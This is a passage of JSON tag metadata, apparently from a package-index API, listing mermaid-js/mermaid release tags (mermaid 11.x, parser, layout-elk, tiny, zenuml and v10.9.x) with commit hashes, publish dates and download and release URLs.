10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid